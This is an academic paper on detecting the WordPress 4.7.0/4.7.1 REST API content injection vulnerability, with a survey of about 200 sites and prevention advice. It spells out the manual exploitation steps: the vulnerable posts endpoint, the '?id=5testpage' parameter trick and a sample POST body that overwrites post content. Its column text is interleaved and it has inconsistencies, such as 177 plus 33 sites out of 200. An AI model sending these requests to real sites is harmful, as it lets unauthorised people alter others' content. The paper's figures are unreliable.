Sie sind auf Seite 1von 5

Automated Detection of WordPress Content Injection Vulnerability

Md. Maruf Hassan Touhid Bhuiyan Saikat Biswas Md. Hasan Sharif
Daffodil International University, Daffodil International University, Daffodil International University Daffodil International
Dhaka, Bangladesh Dhaka, Bangladesh Dhaka, Bangladesh University, Dhaka, Bangladesh
maruf.swe@diu.edu.bd t.bhuiyan@daffodilvarsity.edu.bd saikatbiswas440@gmail.com hasan543@diu.edu.bd

AbstractGiven the increasing need of clients for web In a recent research, the most popular WordPress CMS has
applications, the use of content management systems (CMS) is on been found to contain a vulnerability called WordPress content
the rise. Nowadays, the most popular CMS is WordPress. Almost injection vulnerability. In our study, we develop a detection
32% of all CMS applications are developed in WordPress. tool that will help detect this vulnerability. In this paper, we
However, in a recent study, versions 4.7.0 and 4.7.1 of the briefly discus the WordPress content injection vulnerability and
WordPress CMS have shown to have a vulnerability called
WordPress content injection vulnerability [1][2] This paper aims
its detection techniques, besides providing preventive
to discuss the WordPress content injection vulnerability and measures.
provide a detection system to identify this vulnerability using This paper is structured into eight sections. Section 2 contains
preventive techniques that help to keep the web application user a literature review. Section 3 gives a background to the
more secure. In our research, we study almost 200 CMS web WordPress content injection vulnerability and its impact on
applications and find most of these applications to be vulnerable websites. After developing the detection tools, we provide the
owing to a default vulnerable page and fewer updated versions. detection process in Section 4. Using the tools, we collect data
To help avoid this vulnerability, we provide tools that can detect and perform data analysis in Section 5. The causes of the
this vulnerability. Based on our research, we develop a tool that
content injection vulnerability and the various preventive
detects the WordPress content injection vulnerability and provide
preventive techniques. techniques are provided in Section 6. The conclusion of the
research is provided in Section 7. Finally, Section 8 provides
KeywordsWordPress content injection vulnerability; CMS; outlook for future research.
Detection Tools; prevention

II. LITERATURE REVIEW


I. INTRODUCTION
In our research, we came across several studies on SQLi, XSS,
Nowadays, more than 3.6 billion people across the world use
CSRF, RCE, LFI, LFD code injection, and buffer overflow [7]
the Internet and different web applications via an array of
[8][9][10][11]. Some studies also proposed models for
devices due to their usability and easy anywhere, anytime
detecting this vulnerability [12][13][14][15][16][17], while
access [3]. In fact, web applications form the first step towards
some developed scanning or detection tools based on their
automating day-to-day activities and upgrading existing
proposed models [18][19][20][21][22][23][24][25][26][27].
solutions. As a result, most organizations and service providers
Some researchers also performed analysis-based research on
in industrial, banking, government, educational, medical, and
the existing tools [16][28][29]. Few studies also dealt with
other sectors use web applications to provide their services.
WordPress vulnerability [30][31]. However, we did not find
Although people need to use web applications, there is a high
any research on WordPress content injection vulnerability,
risk of cyber attackers exploiting the weakness of these web
which is the most recently detected vulnerability. In this paper,
applications. According to OWASP and SANS [4][5], some of
our is focus on the WordPress content injection vulnerability
the most common vulnerabilities of web applications are SQLi,
with automated detection tools and its preventive techniques.
broken authentication and session management, XSS, CSRF,
security misconfiguration, LFI, LFD, unprotected APIs, and III. BACKGROUND STUDY
buffer overflow.
In recent years, considerable effort has been made to A. What is WordPress Content Injection?
understand and deal with this problem. For instance, The WordPress content injection vulnerability is a privilege
organizations such as MITRE, SANS, and OWASP have escalation vulnerability that allows an unauthenticated user to
developed security awareness programmes to help companies modify the content of any post or page on a WordPress site.
deal with the issue. Notwithstanding these efforts, a recent
study [6] shows that application developers are yet unable to
implement effective countermeasures for web application B. Why is WordPress Injection a Major Vulnerability?
vulnerabilities. The frequent occurrence of web application This privilege escalation vulnerability affects the WordPress
vulnerability may be ascribed to careless coding and lack of REST API, which was recently added and enabled by default
knowledge of cyber security. on WordPress 4.7.0. One of these REST endpoints allows
To find this vulnerability in an automated way, different access (via the API) to view, edit, delete, and create posts.
researchers have proposed scanning or detection tools based on Within this endpoint, a subtle bug allows visitors to edit any
different models. Some studies also compare the effectiveness post on the site. The REST API is enabled by default on all
of various existing tools. sites using WordPress 4.7.0 or 4.7.1. If your website happens to
be built on these versions of WordPress, then it is currently
vulnerable to this bug.

C. Impact of WordPress Content Injection Vulnerability:


As already mentioned, the WordPress content injection
vulnerability is a privilege escalation bug that allows
unauthorized users to edit any post or content of a WordPress
site. The impact and consequences of SQL injection attacks can
be classified as follows:

1. Confidentiality: Loss of confidentiality is a major


problem with WordPress content injection attacks. Diagram: 1.0
Since this is a privilege escalation vulnerability,
unauthorized persons get access to sensitive data such A. Process of Conducting a Manual Injection:
as edit and other privileges. For the general structural procedure, one first needs to know
2. Integrity: A successful WordPress content injection the CMS versions of the web application. If it is from the
attack allows an external source to make unauthorized affected versions, the vulnerable content page must be
modifications by altering or even editing information searched:
from target web sites.
http://SomeWordpressSite.com/index.php/wp-
3. Authorization: Successful exploitation of the json/wp/v2/posts/5
WordPress content injection vulnerability allows an
attacker to change authorization information and gain If the following content page/post is found in the system, it
elevated privileges. should be injected by any regular user. Our vulnerable page
shows the following error/broken html pages:
Nowadays, cyberattacks pose a major threat to web
applications. The recently released WordPress CMS web [{"id":123907,"date":"2017-03-
application vulnerability is a kind of injection vulnerability that 29T13:52:56","date_gmt":"2017-03-29T20:52:56","guid":
gives an attacker the privilege to make changes to a web {"rendered":"https:\/\/www.demosite.com\/?
application by editing posts, etc. p=123907"},"modified":"2017-03-
29T13:53:12","modified_gmt":"2017-03-
IV. WORDPRESS CONTENT INJECTION 29T20:53:12","slug":"yubihsm-2-open-beta-
It prioritizes $_GET and $_POST values over the ones
VULNERABILITY DETECTION
generated by the routes regular expression, thus making it
possible for an attacker to send a request like: /wp-
The WordPress CMS has remained popular since 2003. Being json/wp/v2/posts/5?id=5testpage.
open source and user-friendly, it became the mostly widely
used CMS. The Secure Sucuri Firm has listed about 6,143 The following get_instance() static method in WordPress is
vulnerabilities from their projects and most of them are used to grab posts.
handled and patched by their lab experts. However this newly 0 To conduct an injection, one has to reply to the POST-ID using
day vulnerability, Content Injection Vulnerability is conducting http $POST methods.
with the REST API directly, in fact in these case it is also
allowing as content injection as well as privilege escalation. In {"id" : "5Test", "title" : "Checking for injection", "content" :
this case, the vulnerability might lead the normal user of the "here is the vulnerable page"}
infected versions 4.7.0 and 4.7.1 to alter the data lists of the
specific pages of the application. With the REST API already enabled in the vulnerable version,
our html request will get executed and appear in the
vulnerable URL. It might also cause a serious remote code
execution (RCE) and JavaScript injection on the server, and
become fully controlled if a web shell is executed. Our tool
will get the response from the web APIs about the demo sites,
and if the response comes from the infected versions, the tool
will search for the vulnerable pages that might lead to an
injection.
V. RESULT ANALYSIS medium, and low. The statistics of the given risk level are
shown in Graph 03. Based on our data set, 31% risk is
A. Result-based Analysis considered critical since the intruder can get full control of the
According to Graph 01, out of the 200 investigated WordPress host server and the admin panel of the web application. As
web applications, 177 were vulnerable while 33 were not many as 46% of websites are marked as high-risk sites, which
vulnerable. This shows that a large number of WordPress can be exploited easily by an outsider, causing serious harm to
websites still contain this injection vulnerability. the host server. In this review, 15% and 8% sites are
considered medium and low, respectively, in terms of the risk
of being exploited by the WordPress content injection
vulnerability.

Graph 01: WordPress content injection vulnerability found


and not found

B. Version-based Analysis:
In our analysis, we found that 106 vulnerable websites had
Graph 03: Levels of risk caused by WordPress content
WordPress version 4.7.0 and 71 websites had version 4.7.1.
injection vulnerability
This is the result we got from our research, but this ratio can
vary in other cases. Therefore, we have to take proper
measures to be safe from this vulnerability. D. Access-based Result:
We found 140 vulnerable websites with specific access to a
page or post. On the other hand, we were able to get full
access in 37 web applications.

Graph: Access-based Analysis


Graph 02: Version-based vulnerability
VI. PREVENTION TECHNIQUES
C. Analysis based on the level of risk creating WordPress
content injection vulnerability: Every WordPress installation makes a request to this server
about once an hour to check for a plugin, theme, or WordPress
The risk level is understood as the impact of compromising core update for general prevention of regular ma.newly
critical information that could be retrieved from the websites
disclosed vulnerability The response from this server contains
due to the WordPress content injection vulnerability. We have
categorized the risk into four different levelscritical, high, information about any newer versions that may be available,
including if the plugin, theme, or core needs to be updated [11] T. Farah, D. Alam, M. N. B. Ali and M. A. Kabir, "Investigation of
Bangladesh region based web applications: A case study of 64 based, local,
automatically. It also includes a URL to download and install and global SQLi vulnerability," 2015 IEEE International WIE Conference on
the updated software. Otherwise, developers need to change the Electrical and Computer Engineering (WIECON-ECE), Dhaka, 2015, pp.
177180
permission of generating new pages for accepting malicious
requests from unauthorized users and execute them to the [12] D. Huluka, O. Popov, Root Cause Analysis of Session Management and
server. Broken Authentication, World Congress on Internet Security (WorldCIS-
2012).
[13] V. M. Nadar, M. Chattergee, L. Jacob, Detection Model for CSRF and
VII. CONCLUSION Broken Authentication and Session Management Attack, International
Journal of Computer Science and Information Technologies, Vol.7(4), 2016,
In our research, we scanned more than 200 WordPress CMS 18011804.
4.7.0 and 4.7.1 web applications from across the world. We [14] L. Dukes, X. Yuan and F. Akowuah, "A case study on web application
found that the WordPress content injection vulnerability is security testing with tools and manual testing," 2013 Proceedings of IEEE
Southeastcon, Jacksonville, FL, 2013, pp. 16.
common for these two versions. In most cases, this
[15] D. Gol and N. Shah, "Detection of web application vulnerability based on
vulnerability occurs in json/wp/b2/posts as default directories. RUP model," 2015 National Conference on Recent Advances in Electronics &
The WordPress content injection vulnerability is a privilege Computer Engineering (RAECE), Roorkee, 2015, pp. 96100.
escalation that allows an unauthorized user to modify the [16] A. Tajpour and M. J. z. Shooshtari, "Evaluation of SQL Injection
content of any post or page on a WordPress site. Thus, proper Detection and Prevention Techniques," 2010 2nd International Conference on
Computational Intelligence, Communication Systems and Networks,
preventive measures should be taken to forestall this Liverpool, 2010, pp. 216221.
vulnerability. The first measure involves updating the [17] H. Shahriar and M. Zulkernine, "Client-Side Detection of Cross-Site
WordPress version. However, if updating this vulnerability is Request Forgery Attacks," 2010 IEEE 21st International Symposium on
not possible, it is recommended to delete the default vulnerable Software Reliability Engineering, San Jose, CA, 2010, pp. 358367.
page.
[18] K. Bhargavan, A. D. Lavaud, C. Fournet, A. Pironti and P. Y. Strub,
VIII. FUTURE WORK "Triple Handshakes and Cookie Cutters: Breaking and Fixing Authentication
over TLS," 2014 IEEE Symposium on Security and Privacy, San Jose, CA,
1. We will enhance the detection tools by adding more 2014, pp. 98113.
features like SQLi, XSS, RCE, broken authentication [19] Q. Zhang, H. Chen and J. Sun, "An execution-flow based method for
etc. detecting Cross-site Scripting attacks," The 2nd International Conference on
Software Engineering and Data Mining, Chengdu, China, 2010, pp. 160165.
REFERENCES [20] G. Agosta, A. Barenghi, A. Parata and G. Pelosi, "Automated Security
[1] Statistics for websites using CMS technologies 2017 [online] available: Analysis of Dynamic Web Applications through Symbolic Code
https://trends.builtwith.com/cms accessed [14 April 2017]. Execution," 2012 Ninth International Conference on Information Technology
- New Generations, Las Vegas, NV, 2012, pp. 189194.
[2] Content Injection Vulnerability in WordPress 2017 [online] available:
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest- [21] Zhushou Tang, Haojin Zhu, Zhenfu Cao and Shuai Zhao, "L-WMxD:
api.html accessed [13 April 2017] Lexical based Webmail XSS Discoverer," 2011 IEEE Conference on
Computer Communications Workshops (INFOCOM WKSHPS), Shanghai,
[3] Internet users in the world 2017 [online] available: 2011, pp. 976981.
http://www.internetlivestats.com/internet-users/ accessed [12 April 2017].
[22] N. Antunes and M. Vieira, "Benchmarking Vulnerability Detection Tools
[4] OWASP top ten vulnerability list 2017 [online] available: for Web Services," 2010 IEEE International Conference on Web Services,
https://www.sans.org/top25-software-errors/ accessed [14 April 2017] Miami, FL, 2010, pp. 203210.
[5] CWE/SANS Top 25 Dangerous Software errors 2017 [online] available: [23] E. Galn, A. Alcaide, A. Orfila and J. Blasco, "A multi-agent scanner to
https://www.sans.org/top25-software-errors/ accessed [12 April 2017] detect stored-XSS vulnerabilities," 2010 International Conference for Internet
[6] CWE-89: Improper Neutralization of Special Elements used in an SQL Technology and Secured Transactions, London, 2010, pp. 16.
Command ('SQL Injection') 2017[online] available: [24] J. Bau, E. Bursztein, D. Gupta and J. Mitchell, "State of the Art:
http://cwe.mitre.org/data/definitions/89.html accessed [14 April 2017] Automated Black-Box Web Application Vulnerability Testing," 2010 IEEE
[7] N. I. Daud, K. A. A. Bakar and M. S. M. Hasan, "A case study on web Symposium on Security and Privacy, Oakland, CA, USA, 2010, pp. 332345.
application vulnerability scanning tools," 2014 Science and Information [25] B. Delamore and R. K. L. Ko, "Escrow: A Large-Scale Web Vulnerability
Conference, London, 2014, pp. 595600. Assessment Tool," 2014 IEEE 13th International Conference on Trust,
[8] H. Shahriar and M. Zulkernine, "Client-Side Detection of Cross-Site Security and Privacy in Computing and Communications, Beijing, 2014, pp.
Request Forgery Attacks," 2010 IEEE 21st International Symposium on 983988.
Software Reliability Engineering, San Jose, CA, 2010, pp. 358367. [26] B. Eshete, A. Villafiorita and K. Weldemariam, "Early Detection of
Security Misconfiguration Vulnerabilities in Web Applications," 2011 Sixth
[9] T. Farah, M. Shojol, M. Hassan and D. Alam, "Assessment of International Conference on Availability, Reliability and Security, Vienna,
vulnerabilities of web applications of Bangladesh: A case study of XSS & 2011, pp. 169174.
CSRF," 2016 Sixth International Conference on Digital Information and [27] Z. Djuric, "A black-box testing tool for detecting SQL injection
Communication Technology and its Applications (DICTAP), Konya, 2016, pp. vulnerabilities," 2013 Second International Conference on Informatics &
7478. Applications (ICIA), Lodz, 2013, pp. 216221.
[10] D. Alam, M. A. Kabir, T. Bhuiyan and T. Farah, "A Case Study of SQL [28] R. Johari and P. Sharma, "A Survey on Web Application Vulnerabilities
Injection Vulnerabilities Assessment of .bd Domain Web Applications," 2015 (SQLIA, XSS) Exploitation and Security Engine for SQL Injection," 2012
Fourth International Conference on Cyber Security, Cyber Warfare, and International Conference on Communication Systems and Network
Digital Forensic (CyberSec), Jakarta, Indonesia, 2015, pp. 7377. Technologies, Rajkot, 2012, pp. 453458.
[29] Atefeh Tajpour, Mohammad Zaman Heydari, Maslin Masrom and
Suhaimi Ibrahim, "SQL injection detection and prevention tools
assessment," 3rd International Conference on Computer Science and [31] Felt, Adrienne Porter, et al. "Diesel: applying privilege separation to
Information Technology, Chengdu, 2010, pp. 518522. database access." Proceedings of the 6th ACM symposium on information,
[30] T. Koskinen, P. Ihantola and V. Karavirta, "Quality of WordPress Plug- computer and communications security. ACM, 2011.
Ins: An Overview of Security and User Ratings," 2012 International
Conference on Privacy, Security, Risk and Trust and 2012 International
Conference on Social Computing, Amsterdam, 2012, pp. 834837.